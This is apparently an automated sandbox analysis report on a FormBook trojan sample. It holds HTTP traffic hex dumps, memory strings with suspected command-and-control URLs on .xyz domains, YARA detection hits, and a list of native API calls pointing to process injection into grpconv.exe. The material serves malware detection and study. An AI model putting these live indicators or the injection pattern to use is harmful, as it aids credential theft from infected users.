          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:39:08 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 12:39:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"Content-Encoding: brData Raw: 31 37 61 62 0d 0a 15 83 5e 00 e0 af f7 7b 97 df a3 2a 3e fe db 7d 17 34 43 d4 7a cd bc ad 11 31 c6 6c a8 62 81 80 c9 16 b1 5d b7 5a d2 91 d4 f7 b6 ba 45 77 6b 1e 7e 54 79 66 bc 5b c6 40 cc cb 4b 1c 6f 76 17 b2 6b 0c 04 b3 c4 ae 14 0b 24 7c fd 47 dc 6b f3 95 33 ff d3 a9 0f 12 55 47 95 9e 1a 24 8a 14 94 e9 51 9f 96 6a 66 77 8b 77 be 2b de 9d 53 f8 57 38 c6 c5 27 29 9e 1d 17 8e cd ec cc be 7d f7 f1 d9 56 12 1b d9 12 38 32 89 3e 14 e4 92 10 fd 94 4b 73 e7 58 22 bf c2 4e 28 4e 54 4e a8 28 51 ef 24 26 72 22 45 28 91 85 10 15 12 25 08 24 8a ea 12 84 04 1d 25 65 28 3a 8a ae 64 19 e6 b2 ae 3d 9f 4d dd cd 42 f2 93 a6 0c fc 2d 13 9d 78 ee e5 d3 67 df 78 e5 0c 2a 4d c5 63 2b 3a 41 c8 39 96 23 6e d0 0b 67 d0 f8 42 6c 45 a5 a9 38 4a 39 d5 7a 8e 19 8c 30 e2 54 14 73 7c 40 71 8c a2 13 e7 40 64 2c bf 40 48 6c 45 27 08 39 c7 72 f4 c2 19 34 be 10 5b c0 e5 8f d7 d7 9f bc 41 c8 15 e6 23 8c 4e a0 04 1c 06 50 73 71 5e 1c 5b 9d e8 04 21 e4 7f 2c 3a 51 09 34 43 b5 82 9c ad e6 58 16 33 54 1a 53 cf 3c 4f 16 b5 5b 81 27 f4 1e ca 93 92 fb e6 e5 c9 1e a2 ca b0 94 43 0d 55 fa 9d ec e1 d8 ea 74 a2 0a 0c 45 69 49 95 06 33 c7 af 9f 7d 9e 4c 30 7a 59 25 41 2b 98 e3 05 83 65 2d 95 c1 28 95 c2 80 30 73 bc 64 99 29 e7 19 2c 58 0a 64 c7 72 1d 26 98 61 94 13 9d 52 0e f3 c0 f5 9d 46 83 7a 1b 43 13 0e 73 21 1d 64 f7 92 e4 cc cc 53 b9 00 85 e9 6d 38 97 aa a2 86 64 60 20 35 4c 0a ba 75 0d 70 a8 4b 29 60 2e 24 a3 0b 58 9d 4e 07 45 45 25 13 69 34 e0 b5 84 64 22 83 95 93 4b ce e5 12 6f 5f dd 88 33 71 88 14 f0 39 a6 dc 80 12 d4 00 46 66 5d c3 1c d3 ba e6 2c a5 86 49 e1 29 ad ff 6e 55 71 8c 0c 33 1c e6 f8 d1 17 9b 47 b7 bf 3b be fa d9 cf 77 fe e3 f1 e6 21 7a f5 b5 d7 d0 f3 00 19 46 a5 82 7c 8e 4b 8d 3f 3d 82 1e d2 8a 86 44 eb 92 bb ab f5 45 2f 07 c8 30 f2 62 f2 55 aa 99 28 12 9a 1e 62 a8 b3 aa b8 aa 53 b7 2e 6b d1 b5 67 62 6b 08 a7 17 f6 af 43 9d 2a 56 1b a4 55 8a ac 63 59 13 2b de 1e cf 94 50 81 f6 68 9e 33 51 80 1a 7a 07 da 2b 4d c5 87 ba 64 0b f7 40 e3 38 f2 d0 22 55 cb 3b 19 bd bf 64 bf 6c 37 68 57 74 45 58 45 0b 20 b5 82 05 83 e5 8c 53 55 80 8d bc d8 8a b4 79 2a f1 c0 1f 20 f2 48 a3 d9 c8 2b cf b3 d4 74 15 3b 13 9a d4 0a 72 30 69 69 ab aa 84 2d 1c 62 8f 05 f9 34 d2 03 ba 72 0b 29 0b 0e b4 66 da 4d 65 f5 71 87 b4 59 73 d0 25 80 b1 11 cb e6 f6 b2 26 09 97 e9 21 e1 2c 51 54 ad 49 aa b5 8d 78 71 d5 f4 13 64 22 e5 4d 06 da 4b b5 f6 32 a6 8d 87 2a f0 68 ad c4 ad 98 70 53 ad 9f 59 80 9a 0f dd a9 db b7 dd 30 62 1b 58 19 ef a7 4e 05 19 a3 73 9b 72 ce 2e 30 09 ec 45 0b 2e 13 ca c9 ce 7d 34 61 82 33 01 2c 72 78 56 27 b6 12 99 ad 2f 11 b2 ac 09 a9 15 68 30 84 a4 92 4b 45 48 c2 69 7a 38 43 7b fe 5d e9 93 Data Ascii: 17ab^
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 12:39:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"Content-Encoding: brData Raw: 31 37 61 62 0d 0a 15 83 5e 00 e0 af f7 7b 97 df a3 2a 3e fe db 7d 17 34 43 d4 7a cd bc ad 11 31 c6 6c a8 62 81 80 c9 16 b1 5d b7 5a d2 91 d4 f7 b6 ba 45 77 6b 1e 7e 54 79 66 bc 5b c6 40 cc cb 4b 1c 6f 76 17 b2 6b 0c 04 b3 c4 ae 14 0b 24 7c fd 47 dc 6b f3 95 33 ff d3 a9 0f 12 55 47 95 9e 1a 24 8a 14 94 e9 51 9f 96 6a 66 77 8b 77 be 2b de 9d 53 f8 57 38 c6 c5 27 29 9e 1d 17 8e cd ec cc be 7d f7 f1 d9 56 12 1b d9 12 38 32 89 3e 14 e4 92 10 fd 94 4b 73 e7 58 22 bf c2 4e 28 4e 54 4e a8 28 51 ef 24 26 72 22 45 28 91 85 10 15 12 25 08 24 8a ea 12 84 04 1d 25 65 28 3a 8a ae 64 19 e6 b2 ae 3d 9f 4d dd cd 42 f2 93 a6 0c fc 2d 13 9d 78 ee e5 d3 67 df 78 e5 0c 2a 4d c5 63 2b 3a 41 c8 39 96 23 6e d0 0b 67 d0 f8 42 6c 45 a5 a9 38 4a 39 d5 7a 8e 19 8c 30 e2 54 14 73 7c 40 71 8c a2 13 e7 40 64 2c bf 40 48 6c 45 27 08 39 c7 72 f4 c2 19 34 be 10 5b c0 e5 8f d7 d7 9f bc 41 c8 15 e6 23 8c 4e a0 04 1c 06 50 73 71 5e 1c 5b 9d e8 04 21 e4 7f 2c 3a 51 09 34 43 b5 82 9c ad e6 58 16 33 54 1a 53 cf 3c 4f 16 b5 5b 81 27 f4 1e ca 93 92 fb e6 e5 c9 1e a2 ca b0 94 43 0d 55 fa 9d ec e1 d8 ea 74 a2 0a 0c 45 69 49 95 06 33 c7 af 9f 7d 9e 4c 30 7a 59 25 41 2b 98 e3 05 83 65 2d 95 c1 28 95 c2 80 30 73 bc 64 99 29 e7 19 2c 58 0a 64 c7 72 1d 26 98 61 94 13 9d 52 0e f3 c0 f5 9d 46 83 7a 1b 43 13 0e 73 21 1d 64 f7 92 e4 cc cc 53 b9 00 85 e9 6d 38 97 aa a2 86 64 60 20 35 4c 0a ba 75 0d 70 a8 4b 29 60 2e 24 a3 0b 58 9d 4e 07 45 45 25 13 69 34 e0 b5 84 64 22 83 95 93 4b ce e5 12 6f 5f dd 88 33 71 88 14 f0 39 a6 dc 80 12 d4 00 46 66 5d c3 1c d3 ba e6 2c a5 86 49 e1 29 ad ff 6e 55 71 8c 0c 33 1c e6 f8 d1 17 9b 47 b7 bf 3b be fa d9 cf 77 fe e3 f1 e6 21 7a f5 b5 d7 d0 f3 00 19 46 a5 82 7c 8e 4b 8d 3f 3d 82 1e d2 8a 86 44 eb 92 bb ab f5 45 2f 07 c8 30 f2 62 f2 55 aa 99 28 12 9a 1e 62 a8 b3 aa b8 aa 53 b7 2e 6b d1 b5 67 62 6b 08 a7 17 f6 af 43 9d 2a 56 1b a4 55 8a ac 63 59 13 2b de 1e cf 94 50 81 f6 68 9e 33 51 80 1a 7a 07 da 2b 4d c5 87 ba 64 0b f7 40 e3 38 f2 d0 22 55 cb 3b 19 bd bf 64 bf 6c 37 68 57 74 45 58 45 0b 20 b5 82 05 83 e5 8c 53 55 80 8d bc d8 8a b4 79 2a f1 c0 1f 20 f2 48 a3 d9 c8 2b cf b3 d4 74 15 3b 13 9a d4 0a 72 30 69 69 ab aa 84 2d 1c 62 8f 05 f9 34 d2 03 ba 72 0b 29 0b 0e b4 66 da 4d 65 f5 71 87 b4 59 73 d0 25 80 b1 11 cb e6 f6 b2 26 09 97 e9 21 e1 2c 51 54 ad 49 aa b5 8d 78 71 d5 f4 13 64 22 e5 4d 06 da 4b b5 f6 32 a6 8d 87 2a f0 68 ad c4 ad 98 70 53 ad 9f 59 80 9a 0f dd a9 db b7 dd 30 62 1b 58 19 ef a7 4e 05 19 a3 73 9b 72 ce 2e 30 09 ec 45 0b 2e 13 ca c9 ce 7d 34 61 82 33 01 2c 72 78 56 27 b6 12 99 ad 2f 11 b2 ac 09 a9 15 68 30 84 a4 92 4b 45 48 c2 69 7a 38 43 7b fe 5d e9 93 Data Ascii: 17ab^
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 12:39:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"Content-Encoding: brData Raw: 31 37 61 62 0d 0a 15 83 5e 00 e0 af f7 7b 97 df a3 2a 3e fe db 7d 17 34 43 d4 7a cd bc ad 11 31 c6 6c a8 62 81 80 c9 16 b1 5d b7 5a d2 91 d4 f7 b6 ba 45 77 6b 1e 7e 54 79 66 bc 5b c6 40 cc cb 4b 1c 6f 76 17 b2 6b 0c 04 b3 c4 ae 14 0b 24 7c fd 47 dc 6b f3 95 33 ff d3 a9 0f 12 55 47 95 9e 1a 24 8a 14 94 e9 51 9f 96 6a 66 77 8b 77 be 2b de 9d 53 f8 57 38 c6 c5 27 29 9e 1d 17 8e cd ec cc be 7d f7 f1 d9 56 12 1b d9 12 38 32 89 3e 14 e4 92 10 fd 94 4b 73 e7 58 22 bf c2 4e 28 4e 54 4e a8 28 51 ef 24 26 72 22 45 28 91 85 10 15 12 25 08 24 8a ea 12 84 04 1d 25 65 28 3a 8a ae 64 19 e6 b2 ae 3d 9f 4d dd cd 42 f2 93 a6 0c fc 2d 13 9d 78 ee e5 d3 67 df 78 e5 0c 2a 4d c5 63 2b 3a 41 c8 39 96 23 6e d0 0b 67 d0 f8 42 6c 45 a5 a9 38 4a 39 d5 7a 8e 19 8c 30 e2 54 14 73 7c 40 71 8c a2 13 e7 40 64 2c bf 40 48 6c 45 27 08 39 c7 72 f4 c2 19 34 be 10 5b c0 e5 8f d7 d7 9f bc 41 c8 15 e6 23 8c 4e a0 04 1c 06 50 73 71 5e 1c 5b 9d e8 04 21 e4 7f 2c 3a 51 09 34 43 b5 82 9c ad e6 58 16 33 54 1a 53 cf 3c 4f 16 b5 5b 81 27 f4 1e ca 93 92 fb e6 e5 c9 1e a2 ca b0 94 43 0d 55 fa 9d ec e1 d8 ea 74 a2 0a 0c 45 69 49 95 06 33 c7 af 9f 7d 9e 4c 30 7a 59 25 41 2b 98 e3 05 83 65 2d 95 c1 28 95 c2 80 30 73 bc 64 99 29 e7 19 2c 58 0a 64 c7 72 1d 26 98 61 94 13 9d 52 0e f3 c0 f5 9d 46 83 7a 1b 43 13 0e 73 21 1d 64 f7 92 e4 cc cc 53 b9 00 85 e9 6d 38 97 aa a2 86 64 60 20 35 4c 0a ba 75 0d 70 a8 4b 29 60 2e 24 a3 0b 58 9d 4e 07 45 45 25 13 69 34 e0 b5 84 64 22 83 95 93 4b ce e5 12 6f 5f dd 88 33 71 88 14 f0 39 a6 dc 80 12 d4 00 46 66 5d c3 1c d3 ba e6 2c a5 86 49 e1 29 ad ff 6e 55 71 8c 0c 33 1c e6 f8 d1 17 9b 47 b7 bf 3b be fa d9 cf 77 fe e3 f1 e6 21 7a f5 b5 d7 d0 f3 00 19 46 a5 82 7c 8e 4b 8d 3f 3d 82 1e d2 8a 86 44 eb 92 bb ab f5 45 2f 07 c8 30 f2 62 f2 55 aa 99 28 12 9a 1e 62 a8 b3 aa b8 aa 53 b7 2e 6b d1 b5 67 62 6b 08 a7 17 f6 af 43 9d 2a 56 1b a4 55 8a ac 63 59 13 2b de 1e cf 94 50 81 f6 68 9e 33 51 80 1a 7a 07 da 2b 4d c5 87 ba 64 0b f7 40 e3 38 f2 d0 22 55 cb 3b 19 bd bf 64 bf 6c 37 68 57 74 45 58 45 0b 20 b5 82 05 83 e5 8c 53 55 80 8d bc d8 8a b4 79 2a f1 c0 1f 20 f2 48 a3 d9 c8 2b cf b3 d4 74 15 3b 13 9a d4 0a 72 30 69 69 ab aa 84 2d 1c 62 8f 05 f9 34 d2 03 ba 72 0b 29 0b 0e b4 66 da 4d 65 f5 71 87 b4 59 73 d0 25 80 b1 11 cb e6 f6 b2 26 09 97 e9 21 e1 2c 51 54 ad 49 aa b5 8d 78 71 d5 f4 13 64 22 e5 4d 06 da 4b b5 f6 32 a6 8d 87 2a f0 68 ad c4 ad 98 70 53 ad 9f 59 80 9a 0f dd a9 db b7 dd 30 62 1b 58 19 ef a7 4e 05 19 a3 73 9b 72 ce 2e 30 09 ec 45 0b 2e 13 ca c9 ce 7d 34 61 82 33 01 2c 72 78 56 27 b6 12 99 ad 2f 11 b2 ac 09 a9 15 68 30 84 a4 92 4b 45 48 c2 69 7a 38 43 7b fe 5d e9 93 Data Ascii: 17ab^
          Source: grpconv.exe, 00000003.00000002.3877214220.000000000545A000.00000004.10000000.00040000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000005.00000002.3876836526.000000000359A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nakama2-sshl.xyz/bgpi/?PJ9L=YTBtpahDWzdXKpondkv4unjklxOnnU8zYfk5eJgvm8
          Source: ooaSzUjoYqoTW.exe, 00000005.00000002.3878220025.00000000051A1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mudanya-nakliyat.xyz
          Source: ooaSzUjoYqoTW.exe, 00000005.00000002.3878220025.00000000051A1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mudanya-nakliyat.xyz/tkqd/
          Source: grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: grpconv.exe, 00000003.00000002.3875818549.000000000285E000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000003.00000002.3875818549.000000000287E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: grpconv.exe, 00000003.00000002.3875818549.000000000287E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: grpconv.exe, 00000003.00000002.3875818549.000000000285E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: grpconv.exe, 00000003.00000002.3875818549.000000000285E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: grpconv.exe, 00000003.00000002.3875818549.000000000285E000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000003.00000002.3875818549.000000000287E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: grpconv.exe, 00000003.00000002.3875818549.000000000285E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: grpconv.exe, 00000003.00000003.2357697042.00000000078C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
          Source: grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: grpconv.exe, 00000003.00000003.2362407184.0000000007915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.lByv6mqTCJ.exe.410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.3876568128.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3876436404.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2132420078.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3875595230.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3876687207.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2134057488.0000000004430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.lByv6mqTCJ.exe.410000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.3876568128.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.3876436404.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2132420078.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.3875595230.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.3876687207.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2134057488.0000000004430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0043BFE3 NtClose,0_2_0043BFE3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852B60 NtClose,LdrInitializeThunk,0_2_01852B60
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01852DF0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01852C70
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018535C0 NtCreateMutant,LdrInitializeThunk,0_2_018535C0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01854340 NtSetContextThread,0_2_01854340
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01854650 NtSuspendThread,0_2_01854650
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852B80 NtQueryInformationFile,0_2_01852B80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852BA0 NtEnumerateValueKey,0_2_01852BA0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852BE0 NtQueryValueKey,0_2_01852BE0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852BF0 NtAllocateVirtualMemory,0_2_01852BF0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852AB0 NtWaitForSingleObject,0_2_01852AB0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852AD0 NtReadFile,0_2_01852AD0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852AF0 NtWriteFile,0_2_01852AF0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852DB0 NtEnumerateKey,0_2_01852DB0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852DD0 NtDelayExecution,0_2_01852DD0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852D00 NtSetInformationFile,0_2_01852D00
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852D10 NtMapViewOfSection,0_2_01852D10
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852D30 NtUnmapViewOfSection,0_2_01852D30
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852CA0 NtQueryInformationToken,0_2_01852CA0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852CC0 NtQueryVirtualMemory,0_2_01852CC0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852CF0 NtOpenProcess,0_2_01852CF0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852C00 NtQueryInformationProcess,0_2_01852C00
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852C60 NtCreateKey,0_2_01852C60
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852F90 NtProtectVirtualMemory,0_2_01852F90
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852FA0 NtQuerySection,0_2_01852FA0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852FB0 NtResumeThread,0_2_01852FB0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852FE0 NtCreateFile,0_2_01852FE0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852F30 NtCreateSection,0_2_01852F30
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852F60 NtCreateProcessEx,0_2_01852F60
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852E80 NtReadVirtualMemory,0_2_01852E80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852EA0 NtAdjustPrivilegesToken,0_2_01852EA0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852EE0 NtQueueApcThread,0_2_01852EE0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852E30 NtWriteVirtualMemory,0_2_01852E30
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01853090 NtSetValueKey,0_2_01853090
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01853010 NtOpenDirectoryObject,0_2_01853010
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018539B0 NtGetContextThread,0_2_018539B0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01853D10 NtOpenProcessToken,0_2_01853D10
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01853D70 NtOpenThread,0_2_01853D70
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04604650 NtSuspendThread,LdrInitializeThunk,3_2_04604650
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04604340 NtSetContextThread,LdrInitializeThunk,3_2_04604340
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602C60 NtCreateKey,LdrInitializeThunk,3_2_04602C60
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04602C70
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04602CA0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_04602D30
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04602D10
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04602DF0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602DD0 NtDelayExecution,LdrInitializeThunk,3_2_04602DD0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602EE0 NtQueueApcThread,LdrInitializeThunk,3_2_04602EE0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_04602E80
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602F30 NtCreateSection,LdrInitializeThunk,3_2_04602F30
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602FE0 NtCreateFile,LdrInitializeThunk,3_2_04602FE0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602FB0 NtResumeThread,LdrInitializeThunk,3_2_04602FB0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602AF0 NtWriteFile,LdrInitializeThunk,3_2_04602AF0
